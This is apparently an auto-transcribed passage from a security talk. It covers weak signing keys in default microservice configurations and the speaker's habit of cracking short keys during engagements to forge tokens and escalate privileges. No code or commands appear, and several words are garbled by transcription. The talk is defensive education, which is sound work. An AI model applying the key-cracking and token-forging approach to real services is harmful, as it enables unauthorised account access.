DevOps

A lot of times especially when building out microservices you're using these default configs for infrastructure's code deploying it out and not thinking about things like the signing keys for that service. When I do an engagement I'll always try to crack six characters because for me three spending three bucks to determine if they have a week signing key is worth it. If you can forge a token to give you more privileges the game's over right even if it's not vertical per basket into a higher-privick even just horizontal going in being able to jump in as anyone else. So we talked about OAuth top ten authentication problems seem to be that when I look at this 10 API security list there's